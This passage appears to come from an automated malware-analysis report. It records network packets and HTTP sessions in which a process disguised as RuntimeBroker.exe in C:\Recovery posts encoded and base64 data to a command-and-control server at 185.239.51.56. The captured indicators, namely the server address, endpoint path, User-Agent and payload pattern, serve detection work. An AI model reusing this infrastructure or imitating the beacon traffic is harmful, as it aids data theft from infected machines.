                                                                                                  Jan 1, 2025 02:28:57.189393044 CET8050148185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:57.309322119 CET5014980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:57.314107895 CET8050149185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:57.314223051 CET5014980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:57.314255953 CET5014980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:57.318969011 CET8050149185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:58.028799057 CET8050149185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:58.144522905 CET5014980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:29:00.741898060 CET5014980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:29:00.746771097 CET8050149185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:29:00.746782064 CET8050149185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:29:00.746788979 CET8050149185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:29:00.973979950 CET8050149185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:29:00.974167109 CET5014980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:29:00.974180937 CET8050149185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:29:00.974384069 CET5014980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:29:00.978940010 CET8050149185.239.51.56192.168.2.4

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • 185.239.51.56

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.449732185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:12.663875103 CET294OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 344
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:13.019464016 CET344OUTData Raw: 05 01 04 01 06 01 01 0a 05 06 02 01 02 04 01 02 00 03 05 08 02 04 03 01 01 06 0a 0d 03 03 01 05 0c 06 06 5b 07 05 04 55 0f 03 05 01 07 57 04 00 04 50 0e 0b 0d 50 07 07 07 06 03 03 01 04 07 58 05 07 0e 09 00 02 05 05 0f 02 0f 02 0d 07 0e 09 07 07
                                                                                                  Data Ascii: [UWPPXPYZP\L~`POwLyLu\sRhRiMwRR~pc[{|Ux`bkTlctl~O~V@@xmvA}r[
                                                                                                  Jan 1, 2025 02:27:13.384083986 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:13.498472929 CET1236INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 01 Jan 2025 01:27:13 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Vary: Accept-Encoding
                                                                                                  Content-Length: 1384
                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Data Raw: 56 4a 7d 5e 7a 6d 51 4a 6f 61 68 49 7c 58 78 59 7c 67 73 0a 6b 5e 79 0b 6d 05 6c 4c 7e 61 6f 5d 77 4d 79 0d 7b 61 5b 01 75 58 68 4b 69 5b 78 01 55 4b 72 51 60 04 7c 5e 68 72 61 04 6b 67 79 54 7b 58 51 55 69 60 67 00 75 04 6e 5b 63 5f 5b 49 68 5f 50 01 7f 7f 7c 0b 7d 67 7f 49 75 66 7b 06 7c 5c 5c 59 7c 70 79 4b 78 49 6c 04 79 67 5e 4c 6f 43 67 4b 79 72 67 59 7b 63 5b 5b 68 63 6c 00 6f 67 56 44 7e 72 73 4e 77 62 60 02 7a 51 41 5b 68 67 7c 4f 6b 61 62 54 62 6f 70 03 6c 42 59 59 74 5e 6e 43 7a 62 72 5d 7e 6f 75 5e 6f 5f 5b 5d 61 5a 7f 03 75 72 60 4c 60 62 72 50 7e 5d 7a 06 63 5c 6d 06 61 66 73 50 7e 6c 65 05 77 6f 77 5d 7c 70 7c 03 78 6f 64 5a 7a 60 65 5a 7c 6d 6f 51 77 74 7c 02 7e 62 5c 09 6a 6e 6f 0b 78 53 6d 5e 7e 71 62 5d 7b 5d 46 51 7c 7f 68 43 7e 63 68 0c 69 5e 7e 01 78 43 5e 58 78 71 74 49 6b 71 55 00 7d 64 7b 42 68 06 69 08 7a 73 74 06 69 5b 70 46 77 63 65 51 7b 5c 79 4a 77 76 68 4b 7d 76 64 05 7d 58 61 08 76 72 7b 49 7c 72 7d 4f 7d 67 58 0d 79 66 7c 40 7d 73 77 05 77 72 6d 06 76 71 5f 48 7e 71 [TRUNCATED]
                                                                                                  Data Ascii: VJ}^zmQJoahI|XxY|gsk^ymlL~ao]wMy{a[uXhKi[xUKrQ`|^hrakgyT{XQUi`gun[c_[Ih_P|}gIuf{|\\Y|pyKxIlyg^LoCgKyrgY{c[[hclogVD~rsNwb`zQA[hg|OkabTboplBYYt^nCzbr]~ou^o_[]aZur`L`brP~]zc\mafsP~lewow]|p|xodZz`eZ|moQwt|~b\jnoxSm^~qb]{]FQ|hC~chi^~xC^XxqtIkqU}d{Bhizsti[pFwceQ{\yJwvhK}vd}Xavr{I|r}O}gXyf|@}swwrmvq_H~qzKlVNgcvaw{Lm~`}IxgtxIRBym{ybt{MbNxJywp~rUu_tJ~B]E|wR|qSullNxBdw`vCyOWI||zzaTFv]Qua^LtOfC|^fNtLauex|aMw||~spDxBwK{^PJSttIh~LrO~}oxCb}rqNR|pC}ph~wPM{Ssxbx~a{J~YQ`ay]`~\pwMezqaIuvt~vh}v}@tL}ry|wfxH`~cYwruNvqa_zF}RVCwcDv_gxbmH}`axIZxw`xmwxrlI{MP{]NZyt|~uqgX~{|Ixka}CaUhN{|dtNSS{a}J|of_z\y\}b`g{ZL~JxYa[`b~\bfh@|oiLcl{XcZl|pZopq_kS|tw|Aq~@zSYQTTqin~]QY]OVR|cHa^OBQdJc~{AUXtik`OSsPnt\|u|Hwci@nbyKvXp~XZMe}O`bUk\~]}dyT{vp~]wbuq\Lr^kbFRpcWQdU[XdHQanJWwqY^Axw`@{m{K{\pzd~E{Y]_Tw@WaRGZYZR`d{Y^QfXbq~U@VUBXuw}WnbGQpeXTbW[Z`]YbCp_XPeYeppTC[\JQ}{z[coBSo]WoTVYe]SnLh]je~zRb|P@
                                                                                                  Jan 1, 2025 02:27:13.498483896 CET377INData Raw: 5f 6a 04 66 41 51 73 49 09 68 0a 55 4c 68 07 7b 54 69 01 5b 42 57 52 07 5b 54 61 64 58 7e 5c 78 7c 69 6b 55 5f 66 63 09 41 55 4e 70 46 79 5b 51 5d 5b 04 72 4b 50 62 54 43 5a 5e 08 58 51 01 67 42 54 7a 72 0d 68 04 0b 58 68 65 79 03 7b 5f 65 6d 7f
                                                                                                  Data Ascii: _jfAQsIhULh{Ti[BWR[TadX~\x|ikU_fcAUNpFy[Q][rKPbTCZ^XQgBTzrhXhey{_em[NQidF[q@cTEi}GToS]^|ab\|\WYecCRto_uwoa`]TO|B|ZSZP{@RdQCQZ]ZRo^P]c|PfUqRV_aStXuw}WnbGQpeXTbWaF\rYCcbeYuCceqqZNRVbZp}AkosCos[ywy]hnN[{
                                                                                                  Jan 1, 2025 02:27:13.531605959 CET270OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 384
                                                                                                  Expect: 100-continue
                                                                                                  Jan 1, 2025 02:27:13.795865059 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:13.796144962 CET384OUTData Raw: 56 5e 5e 54 5f 5f 5e 54 5f 5a 5a 53 57 50 56 5e 5f 54 5d 46 51 51 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V^^T__^T_ZZSWPV^_T]FQQW[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$(2"20[%0X--2[+$>+:5C.X7(#388&Q>-"^%#[.
                                                                                                  Jan 1, 2025 02:27:14.029853106 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:13 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.449735185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:13.723997116 CET271OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Jan 1, 2025 02:27:14.065717936 CET2504OUTData Raw: 53 58 5b 52 5f 5d 5b 57 5f 5a 5a 53 57 5d 56 50 5f 5a 5d 42 51 54 57 5e 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SX[R_][W_ZZSW]VP_Z]BQTW^^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['+?-""(]&$Z,[&<$*?"6.^##U%( [%41."^%#[.6
                                                                                                  Jan 1, 2025 02:27:14.432113886 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:14.443099976 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:14 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.449737185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:14.068859100 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 1600
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:14.068979979 CET1600OUTData Raw: 53 59 5e 54 5a 5b 5b 53 5f 5a 5a 53 57 5d 56 55 5f 5d 5d 44 51 53 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: SY^TZ[[S_ZZSW]VU_]]DQSW_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['A+1610%3;;"X+"]((Z!%6[ 87P3;8[22Y:="^%#[.6
                                                                                                  Jan 1, 2025 02:27:14.842042923 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:14.848452091 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:14 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.449738185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:14.634640932 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:14.987566948 CET2504OUTData Raw: 56 5b 5b 53 5a 5e 5e 51 5f 5a 5a 53 57 58 56 55 5f 54 5d 40 51 51 57 51 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V[[SZ^^Q_ZZSWXVU_T]@QQWQ^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W]['C<<>Y"23+/-*+>]?89^"783(%-9-"^%#[."
                                                                                                  Jan 1, 2025 02:27:15.336150885 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:15.346797943 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:15 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.449742185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:14.859915972 CET341OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----4k4tMK3G3KPi7KkCKThjRxh2CLpKVewxph
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 112350
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:15.206470966 CET12360OUTData Raw: 2d 2d 2d 2d 2d 2d 34 6b 34 74 4d 4b 33 47 33 4b 50 69 37 4b 6b 43 4b 54 68 6a 52 78 68 32 43 4c 70 4b 56 65 77 78 70 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                  Data Ascii: ------4k4tMK3G3KPi7KkCKThjRxh2CLpKVewxphContent-Disposition: form-data; name="0"Content-Type: text/plainV]^_ZZ^V_ZZSW_VW_]]DQ\W[^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZ
                                                                                                  Jan 1, 2025 02:27:15.211391926 CET2472OUTData Raw: 67 67 43 71 54 79 51 44 54 78 71 67 52 46 64 37 5a 64 30 56 72 33 4c 66 42 6a 6c 42 79 6a 2f 2f 52 6e 53 4d 6a 77 6b 4c 54 79 35 74 42 49 72 71 5a 66 54 53 31 61 63 48 4a 58 67 79 67 50 6e 33 71 78 61 55 42 67 59 62 2b 5a 65 39 68 45 66 72 47 68
                                                                                                  Data Ascii: ggCqTyQDTxqgRFd7Zd0Vr3LfBjlByj//RnSMjwkLTy5tBIrqZfTS1acHJXgygPn3qxaUBgYb+Ze9hEfrGhKoPtCLOABGdZ9SYzdY+wiUMpCcvIS+DKdSl1ug1M+/eR4Hcy6AV2L7cYxXQM5hDoDiXkT2cZuIUiI13kE0hjMTCjHqHPOJaZBTqEgREVheQisBUYhDM0JGfRnT2/u1bcGOeWvkxQ1a0lWJSMGUjeHQNRSkCqRKDRs
                                                                                                  Jan 1, 2025 02:27:15.211435080 CET7416OUTData Raw: 77 30 55 36 64 34 6a 73 58 4a 63 52 58 44 4e 74 62 47 32 55 69 38 37 44 53 57 7a 69 44 2f 2f 5a 2f 6c 31 2f 50 75 2f 71 34 33 4e 74 62 39 59 65 6a 41 71 37 35 6c 47 41 62 67 55 4c 32 33 64 33 46 2b 4e 44 6a 4b 79 32 65 48 63 6e 47 4c 74 4d 6b 33
                                                                                                  Data Ascii: w0U6d4jsXJcRXDNtbG2Ui87DSWziD//Z/l1/Pu/q43Ntb9YejAq75lGAbgUL23d3F+NDjKy2eHcnGLtMk349Htp43TDXin2m03vilmQqZjyRLkEtZdqswZmQR/wd8CJY19DMND8I/fmGWGTjoD5ylPyo7sNvkjy5wHOvsbnBUJAChNjGrO/PkFGnd+LnPaZTcRLbdBtUULcPz+6gTX377Gb8t83IIZ9xmo4C7a0i3qDfJ8+XSil
                                                                                                  Jan 1, 2025 02:27:15.211452007 CET2472OUTData Raw: 43 75 51 36 71 6d 47 7a 54 75 71 61 63 77 76 39 4c 47 48 7a 2b 30 50 46 37 38 50 35 48 44 65 58 59 6f 50 37 53 64 66 68 4e 54 72 6e 43 4c 46 65 53 46 4f 36 43 37 63 58 6e 6f 38 48 44 70 52 66 2b 76 53 39 76 63 37 52 63 63 46 75 43 64 4e 52 69 4a
                                                                                                  Data Ascii: CuQ6qmGzTuqacwv9LGHz+0PF78P5HDeXYoP7SdfhNTrnCLFeSFO6C7cXno8HDpRf+vS9vc7RccFuCdNRiJgePyiX0D5PeFM7t/4tLKW3vEHC+YzU3xc8NcWIvf43WbQ8tfwdVmKpZpnjdYkfG+fIGkYKeGbo/Zr8xnJZR73ieg2EeCys6lF7s/qbWuuI02U9Rje+Nu3S8w0euL+t0PpawQhP1BayLP4drMGd7aN8unak5beXyej
                                                                                                  Jan 1, 2025 02:27:15.211483955 CET4944OUTData Raw: 41 51 47 31 52 49 65 68 43 36 66 52 73 70 35 75 4c 77 57 77 53 6d 44 52 58 6a 5a 55 6f 4d 76 51 62 45 4b 77 75 2f 50 73 74 55 6b 35 69 30 48 61 52 5a 47 43 37 55 6b 4e 30 6a 4e 61 44 41 41 6b 5a 77 48 53 30 41 42 6a 58 76 37 74 41 76 69 42 44 2f
                                                                                                  Data Ascii: AQG1RIehC6fRsp5uLwWwSmDRXjZUoMvQbEKwu/PstUk5i0HaRZGC7UkN0jNaDAAkZwHS0ABjXv7tAviBD/534GxQn4wqNPfEoF/uiUMc9E1vCjW6DuRl8Xlefsbnen1kytRX9MN5CsBq4ICXnNy6tPytqIE7uMFrsnZDMfI8GxaybNjj0bn4KqLc9nSWwgTqRuYEpDJlxJuqJY//h4T/vOmPjxOCT5GzHSehZ7hOLi5RHxgZPYe
                                                                                                  Jan 1, 2025 02:27:15.211642981 CET4944OUTData Raw: 2f 51 4a 6f 70 6a 35 61 79 61 35 4c 78 4d 7a 6e 6f 31 75 42 71 6e 37 45 36 75 59 64 73 53 77 31 4f 6f 72 59 49 57 46 7a 39 75 2f 51 4c 62 34 33 67 7a 2b 4d 42 69 44 66 34 65 77 66 72 6b 67 58 74 2f 66 30 70 64 44 4d 30 6d 6a 38 4c 54 77 44 72 6f
                                                                                                  Data Ascii: /QJopj5aya5LxMzno1uBqn7E6uYdsSw1OorYIWFz9u/QLb43gz+MBiDf4ewfrkgXt/f0pdDM0mj8LTwDro3Jyt/u+8s5tMBKZ2o0Lti3+iNzZHWL/JFwpboiSSTsYPrLbT7/43dOt+5gNEeSZvKLmR8aaq73e2jYByQQIxfnyuSK+HcqsvR0ZNPqolFijGfA8EmedCxkhOpp54ZxfauT3lHcycd7b7gY7xEvCjK6jMk7tpmwrzn
                                                                                                  Jan 1, 2025 02:27:15.211662054 CET2472OUTData Raw: 4c 65 44 57 59 48 58 34 41 31 74 58 4e 56 59 4d 4e 69 78 32 38 4e 44 41 2b 67 30 4b 42 51 74 59 6d 6e 57 44 61 4b 69 45 53 61 44 5a 64 2f 45 74 30 5a 79 6b 45 57 44 58 64 47 79 64 52 4e 6d 64 50 6a 30 2f 71 55 37 4a 59 48 57 66 6a 49 73 74 2f 4d
                                                                                                  Data Ascii: LeDWYHX4A1tXNVYMNix28NDA+g0KBQtYmnWDaKiESaDZd/Et0ZykEWDXdGydRNmdPj0/qU7JYHWfjIst/MTjKXcC8kmIL0cu6JzCf8xCOdrZ8hjjAj3897MYM7/T6HCCGsLZaKQNrFiQuqV1iytIUokVJTa4aysa0Cfyw7CX1lGDwnghZ8Bg9gpecHLXOwPTo26DCAfRbsNl/H+TBYwj+RnebDdBewg1fyI85YDwo0XPi5aEeqU
                                                                                                  Jan 1, 2025 02:27:15.216248035 CET4944OUTData Raw: 31 37 71 4b 73 69 75 41 70 64 2b 78 37 56 4c 61 2b 4c 4b 6a 34 45 2b 55 52 42 54 62 46 31 56 45 30 72 37 43 51 4e 31 34 62 55 48 72 59 73 47 4d 44 7a 4b 50 70 48 54 76 70 70 72 37 2f 42 32 73 6f 6e 47 67 70 59 6d 48 4b 30 54 66 54 32 4f 6f 65 4c
                                                                                                  Data Ascii: 17qKsiuApd+x7VLa+LKj4E+URBTbF1VE0r7CQN14bUHrYsGMDzKPpHTvppr7/B2sonGgpYmHK0TfT2OoeLBvR0RW7qYFUebHumVXt7fLhf2DKZZOkYYDB7jlLeDNYV4SIQCc95Oer8H40vDGuTILX07Gd302muDgWpCm7m7pecCIO3eEiiG4DOD9Ce5Q8K+pXKf4VxS/Q/FPi2f176CwhCRyJD6UZBEcn5olMf+W2NI4fXytBVB
                                                                                                  Jan 1, 2025 02:27:15.216294050 CET4944OUTData Raw: 45 51 72 66 73 52 53 33 39 4e 76 75 57 2f 49 55 6e 77 46 45 45 32 6b 4e 49 73 62 48 4d 4b 30 77 72 59 4f 35 56 2f 70 4a 70 6e 39 34 50 34 44 65 43 4b 76 4e 71 36 34 78 47 67 72 59 50 72 32 7a 49 79 55 6c 6d 7a 2b 64 37 38 44 63 58 4a 61 44 47 76
                                                                                                  Data Ascii: EQrfsRS39NvuW/IUnwFEE2kNIsbHMK0wrYO5V/pJpn94P4DeCKvNq64xGgrYPr2zIyUlmz+d78DcXJaDGv5S+mL4Pt3Ij/Ucy1LXKhYKeUMOcRdhJjXY/dyy2pgZaPXxjfz6r6bcSPHrpi1FTGZPuCdVyeTcdGT0w452dCtLxMNP055hZPwRok5hdlJXnEba6bvTSJVtUVRQn7lPdfJrzjtl9Y/QCeKxZQ3mCpQTc7+HHkaX6eh
                                                                                                  Jan 1, 2025 02:27:15.216331005 CET4944OUTData Raw: 6b 6b 41 6b 50 35 70 42 79 7a 49 39 4c 6c 55 57 66 37 47 79 6c 71 64 7a 48 34 2b 38 54 38 70 4f 42 4a 6f 33 54 6e 77 30 73 4e 76 39 41 52 4b 46 56 66 73 46 6b 59 32 4e 44 55 68 74 4b 41 62 5a 63 59 75 48 52 77 5a 6b 69 2b 38 4d 42 4e 74 66 54 73
                                                                                                  Data Ascii: kkAkP5pByzI9LlUWf7GylqdzH4+8T8pOBJo3Tnw0sNv9ARKFVfsFkY2NDUhtKAbZcYuHRwZki+8MBNtfTsoaTjzBLf4gA6QBJohGzr6TtQe3hqNBF5bUlbpFS1OOoH8zLq5oYXUY0aBSAB95uk/9G7Y/EhUvTfjNYOsmDo3E6kl5qpokm+85GK+kldEtENY/CDM8uzecT+xDJrPekrbojg4fqE1ZHTc5YH4URtkKmgkPvp+CqW8
                                                                                                  Jan 1, 2025 02:27:15.560447931 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:15.959947109 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:15 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.449743185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:15.472629070 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2504
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:15.831309080 CET2504OUTData Raw: 56 5d 5e 5f 5a 59 5b 52 5f 5a 5a 53 57 5f 56 54 5f 59 5d 42 51 5c 57 5f 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
                                                                                                  Data Ascii: V]^_ZY[R_ZZSW_VT_Y]BQ\W_^ZX_[[U^][_]R_WS^VY][\T[UVXAF^QXWZSQ^[[TZW]BWEQRXY[]Z_[\[[TPT\\[U^Z_[ZVQQ_YRZX^ZX^\^_P^][WWQ[_PPXRX_PV]X^RZRS^^[Y^YRTC^SQ[Q@S_[]^[_\]\UWZ^CX_P\UX\V\XVVTCFX^\W][$+5Z%8\;!?9<"5&#70;711--"^%#[.>
                                                                                                  Jan 1, 2025 02:27:16.171907902 CET25INHTTP/1.1 100 Continue
                                                                                                  Jan 1, 2025 02:27:16.187468052 CET185INHTTP/1.0 500 Internal Server Error
                                                                                                  Date: Wed, 01 Jan 2025 01:27:16 GMT
                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.449744185.239.51.56806340C:\Recovery\RuntimeBroker.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Jan 1, 2025 02:27:16.382376909 CET295OUTPOST /externalVmpacketlongpollSqldbFloweruniversalCentral.php HTTP/1.1
                                                                                                  Content-Type: application/octet-stream
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                  Host: 185.239.51.56
                                                                                                  Content-Length: 2500
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Jan 1, 2025 02:27:16.737540960 CET2500OUTData Raw: 53 5e 5b 55 5f 5b 5e 57 5f 5a 5a 53 57 59 56 5f 5f 58 5d 45 51 57 57 5b 5e 5a 58 5f 5b 5b 55 5e 5d 5b 5f 5d 52 5f 57 53 5e 56 59 5d 5b 5c 54 5b 55 56 58 41 46 5e 51 58 57 5a 53 51 5e 5b 5b 54 5a 57 5d 42 57 45 51 52 58 59 5b 5d 5a 5f 5b 5c 5b 5b
